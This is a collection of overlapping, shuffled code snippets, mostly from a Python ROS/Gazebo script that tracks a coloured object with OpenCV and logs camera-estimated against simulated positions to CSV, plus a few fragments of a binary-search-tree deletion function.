deleteNode(root.right, v.data) # Delete the inorder successor return root", "== None: return if key < root.data: root.left = deleteNode(root.left, key) # If", "same as root's key, then this is the node to be deleted if", "deleteNode(root, key): if root == None: return if key < root.data: root.left =", "tmp elif root.right == None: tmp = root.left root = None return tmp", "iorder successor or the next higher node as per the inorder traversal \"\"\"", "there is only one child of the root or no child v =", "the next higher node as per the inorder traversal \"\"\" current = root" ]
[]
[ "from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from", "* z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y =", "vision.camera import Camera from color_detection import ColorDetection import cv2 as cv import rospy", "rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None and not", "t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask", "# cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\",", "\"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point,", "import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import", "pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y", "math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer =", "== 27: break fps = 0.9 * fps + 0.1 * 1 /", "= 62.2 FOVY = 48.8 KX = FOVX / FW / 180.0 *", "global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z", "z, roll, pitch, yaw x_ = math.tan(KX * x - roll) * z", "# y_ = math.tan(KY * y + pitch - 1.57079632679) * z out_x", "/ (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap", "Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion,", "z # y_ = math.tan(KY * y + pitch - 1.57079632679) * z", "* x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\":", "z # x_ = math.tan(KX * x + roll) * z # y_", "= rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState)", "time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv", "Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold", "= (180, 230, 255) FW = 320 FH = 240 FOVX = 62.2", "rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x =", "30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now()", "= 0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose =", "waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001 pose.position.y =", "* math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer", "cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if", "# cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break fps =", "1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y", "pose = Pose() z = 0 roll = 0 pitch = 0 yaw", "= PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY - 120 centroid.point.y", "y + pitch - 1.57079632679) * z out_x = -math.sin(yaw) * x_ -", "ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose", "roll) * z # y_ = math.tan(KY * y + pitch - 1.57079632679)", "cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX", "t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X -", "yaw, waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z,", "model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame,", "yaw = 0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose", "rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam'", "cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu,", "key = cv.waitKey(15) if key == 27: break fps = 0.9 * fps", "Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real", "models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose =", "15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub", "#!/usr/bin/env python3 import ta_vision from vision.camera import Camera from color_detection import ColorDetection import", "= open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X',", "'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X', 'Real Position Y'])", "msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw)", "model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold,", "centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos =", "0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) #", "import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190,", "csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real", "None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0", "import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180,", "pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll,", "(240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5,", "rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model", "ta_vision from vision.camera import Camera from color_detection import ColorDetection import cv2 as cv", "upper_threshold = (180, 230, 255) FW = 320 FH = 240 FOVX =", "y_ = math.tan(KY * y + pitch - 1.57079632679) * z out_x =", "FOVY = 48.8 KX = FOVX / FW / 180.0 * math.pi KY", "# cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240,", "127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127,", "from color_detection import ColorDetection import cv2 as cv import rospy import time import", "ColorDetection import cv2 as cv import rospy import time import math from geometry_msgs.msg", "if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame,", "quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230, 255)", "= cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture()", "pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y,", "cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame", "orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu =", "= [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now()", "z y_ = math.tan(KY * y - pitch) * z # x_ =", "open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time',", "+ 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if", "= cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown():", "import rospy import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import", "* y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate =", "cv2 as cv import rospy import time import math from geometry_msgs.msg import PointStamped", "frame = cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame =", "= cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y)", "pose.position.x = pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose", "/ 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv',", "- math.sin(yaw) * y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\")", "z = 0 roll = 0 pitch = 0 yaw = 0 def", "* 1 / (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass", "[msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def", "geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import", "waktu pose = msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w]", "gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg", "gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg", "y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x", "Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu,", "yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll, pitch,", "python3 import ta_vision from vision.camera import Camera from color_detection import ColorDetection import cv2", "cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX,", "(time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is", "- roll) * z y_ = math.tan(KY * y - pitch) * z", "import cv2 as cv import rospy import time import math from geometry_msgs.msg import", "= math.tan(KX * x + roll) * z # y_ = math.tan(KY *", "queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates,", "Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states',", "geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg", "if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub", "camera capture..\") frame = cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep()", "- t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not", "euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold = (180, 230,", "1 / (time.time() - t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if", "'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position", "centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\",", "pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position)", "(roll, pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z,", "* y + pitch - 1.57079632679) * z out_x = -math.sin(yaw) * x_", "= 0 yaw = 0 def models_cb(msg): global pose, z, roll, pitch, yaw,", "pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5, 127, -1) cv.putText(frame, \"fps:", "= msg.pose[1] z = msg.pose[1].position.z orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w] (roll, pitch,", "captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame = cap.capture()", "2) # if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps:", "cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x + 0.001", "model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600)", "Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while", "pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid, 5,", "= pose.position.x + 0.001 pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model)", "= FOVX / FW / 180.0 * math.pi KY = FOVY / FH", "rospy import time import math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates", "# 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5)", "PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState", "ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None", "pitch, yaw) = euler_from_quaternion(orientation_list) waktu = rospy.Time.now() def trans_data(x, y): global z, roll,", "SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5", "real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position", "PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model =", "5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5,", "180.0 * math.pi KY = FOVY / FH / 180.0 * math.pi #", "* y - pitch) * z # x_ = math.tan(KX * x +", "import Point from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv", "62.2 FOVY = 48.8 KX = FOVX / FW / 180.0 * math.pi", "(240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key =", "= -math.sin(yaw) * x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_", "-0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\")", "= -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold)", "%.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid: #", "0 def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1]", "Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y])", "0.5, 127, 2) cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key", "\"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if cd.has_centroid:", "= cv.waitKey(15) if key == 27: break fps = 0.9 * fps +", "cd.centroid centroid = PointStamped() centroid.point.x = cX - 160 centroid.point.y = cY -", "0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid:", "127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)", "rate.sleep() except rospy.ROSInterruptException: pass if cap is not None: cap.close() cv.destroyAllWindows() cam_csv.close() real_csv.close()", "pose.position.y = pose.position.y + 0.001 model.pose = pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >=", "0 pitch = 0 yaw = 0 def models_cb(msg): global pose, z, roll,", "out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if", "= rospy.Publisher('/datalog/cam', Point, queue_size=5) real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped,", "geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160,", "frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps", "cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame", "Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y -", "'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y'])", "if cd.has_centroid: # cv.circle(mask, cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" %", "* fps + 0.1 * 1 / (time.time() - t) t = time.time()", "from geometry_msgs.msg import Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold =", "= pose set_state(model_state=model) real_pos_pub.publish(pose.position) if pose.position.x >= 0.5: break if cd.has_centroid: cv.circle(frame, cd.centroid,", "if cd.centroid: (cX, cY) = cd.centroid centroid = PointStamped() centroid.point.x = cX -", "- 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) = trans_data(centroid.point.x,", "key == 27: break fps = 0.9 * fps + 0.1 * 1", "frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY)", "x_ = math.tan(KX * x - roll) * z y_ = math.tan(KY *", "cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if cd.centroid: (cX, cY) = cd.centroid", "- pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x,", "t) t = time.time() rate.sleep() except rospy.ROSInterruptException: pass if cap is not None:", "Position Y', 'Time', 'Real Position X', 'Real Position Y']) real_writer.writerow(['Time', 'Real Position X',", "= pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap = Camera(port=5600) cd", "while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask = cd.update(frame) if", "Quaternion from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220)", "waktu = rospy.Time(0) pose = Pose() z = 0 roll = 0 pitch", "%f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos)", "return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) #", "not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t =", "import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import", "* z # x_ = math.tan(KX * x + roll) * z #", "set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState) rospy.wait_for_message('/gazebo/model_states', ModelState) model = ModelState() model.model_name='pi_cam' model.pose = pose", "cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) # if", "open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam", "- 1.57079632679) * z out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_", "set_state(model_state=model) cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame", "Camera from color_detection import ColorDetection import cv2 as cv import rospy import time", "ModelState() model.model_name='pi_cam' model.pose = pose model.pose.position.x = -0.5 model.pose.position.y = -0.5 set_state(model_state=model) cap", "- pitch) * z # x_ = math.tan(KX * x + roll) *", "trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX * x -", "cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position", "import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg import", "real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb)", "cv.imshow(\"Frame\", frame) # cv.imshow(\"Frame\", mask) key = cv.waitKey(15) if key == 27: break", "cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2) cv.imshow(\"Frame\", frame)", "from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from", "= math.tan(KY * y - pitch) * z # x_ = math.tan(KX *", "= time.time() while not rospy.is_shutdown(): frame = cap.capture() t_cap = rospy.Time.now() mask =", "frame = cap.capture() rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not", "for camera capture..\") frame = cap.capture() while frame is None and not rospy.is_shutdown():", "math from geometry_msgs.msg import PointStamped from gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState", "cd.centroid, 5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5,", "/ FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv", "x_ = math.tan(KX * x + roll) * z # y_ = math.tan(KY", "= ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is", "x + roll) * z # y_ = math.tan(KY * y + pitch", "# CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv)", "global z, roll, pitch, yaw x_ = math.tan(KX * x - roll) *", "def models_cb(msg): global pose, z, roll, pitch, yaw, waktu pose = msg.pose[1] z", "rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X,", "gazebo_msgs.msg import ModelStates from gazebo_msgs.srv import SetModelState from gazebo_msgs.msg import ModelState from geometry_msgs.msg", "(out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15", "import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion from tf.transformations import", "== \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15) # 15 FPS cam_pos_pub = rospy.Publisher('/datalog/cam',", "= csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X',", "math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__ ==", "(160, 190, 220) upper_threshold = (180, 230, 255) FW = 320 FH =", "(X, Y) = trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y", "'w') cam_writer = csv.writer(cam_csv) real_writer = csv.writer(real_csv) cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position", "0 roll = 0 pitch = 0 yaw = 0 def models_cb(msg): global", "= math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x, out_y) if __name__", "'Real Position X', 'Real Position Y']) waktu = rospy.Time(0) pose = Pose() z", "cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w') real_csv = open('/home/musyafa/Datalog/real.csv', 'w') cam_writer = csv.writer(cam_csv) real_writer =", "cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y]) real_writer.writerow([waktu, pose.position.x, pose.position.y]) pose.position.x = pose.position.x", "y_ return (out_x, out_y) if __name__ == \"__main__\": try: rospy.init_node(\"color_detection\") rate = rospy.Rate(15)", "queue_size=5) cam_pub = rospy.Publisher(\"camera/data\", PointStamped, queue_size=10) rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb) set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)", "= 0 pitch = 0 yaw = 0 def models_cb(msg): global pose, z,", "while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame captured!\")", "= rospy.Time.now() def trans_data(x, y): global z, roll, pitch, yaw x_ = math.tan(KX", "cd.centroid, 5, 127, -1) # cv.putText(mask, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX,", "cv.waitKey(15) if key == 27: break fps = 0.9 * fps + 0.1", "color_detection import ColorDetection import cv2 as cv import rospy import time import math", "cY - 120 centroid.point.y = -centroid.point.y centroid.header.stamp = t_cap cam_pub.publish(centroid) (X, Y) =", "= math.tan(KX * x - roll) * z y_ = math.tan(KY * y", "* y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_ return (out_x,", "- pose.position.y) cam_pos = Point(x=X, y=Y, z=1) cam_pos_pub.publish(cam_pos) cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x,", "cap = Camera(port=5600) cd = ColorDetection(lower_threshold, upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame =", "from tf.transformations import euler_from_quaternion, quaternion_from_euler import csv lower_threshold = (160, 190, 220) upper_threshold", "FOVY / FH / 180.0 * math.pi # CSV cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w')", "cap.capture() while frame is None and not rospy.is_shutdown(): rate.sleep() frame = cap.capture() rospy.loginfo(\"Frame", "FW = 320 FH = 240 FOVX = 62.2 FOVY = 48.8 KX", "%f; ERRY: %f\", X - pose.position.x, Y - pose.position.y) cam_pos = Point(x=X, y=Y,", "ModelState from geometry_msgs.msg import Pose from geometry_msgs.msg import Point from geometry_msgs.msg import Quaternion", "= trans_data(centroid.point.x, centroid.point.y) rospy.loginfo(\"ERRX: %f; ERRY: %f\", X - pose.position.x, Y - pose.position.y)", "x_ - math.cos(yaw) * y_ out_y = math.cos(yaw) * x_ - math.sin(yaw) *", "190, 220) upper_threshold = (180, 230, 255) FW = 320 FH = 240", "upper_threshold) rospy.loginfo(\"Wait for camera capture..\") frame = cap.capture() while frame is None and", "5, 127, -1) cv.putText(frame, \"fps: %.1f\" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127,", "KY = FOVY / FH / 180.0 * math.pi # CSV cam_csv =", "rospy.loginfo(\"Frame captured!\") fps = 30.0 t = time.time() while not rospy.is_shutdown(): frame =", "cY) = cd.centroid centroid = PointStamped() 